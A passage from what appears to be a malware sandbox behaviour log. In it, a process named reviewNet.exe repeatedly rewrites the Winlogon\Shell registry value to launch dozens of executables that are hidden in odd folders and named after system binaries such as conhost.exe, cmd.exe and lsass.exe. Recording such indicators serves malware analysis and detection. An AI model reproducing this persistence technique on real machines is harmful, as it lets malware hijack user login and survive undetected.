Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\", \"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\", \"C:\\Users\\Admin\\wininit.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", 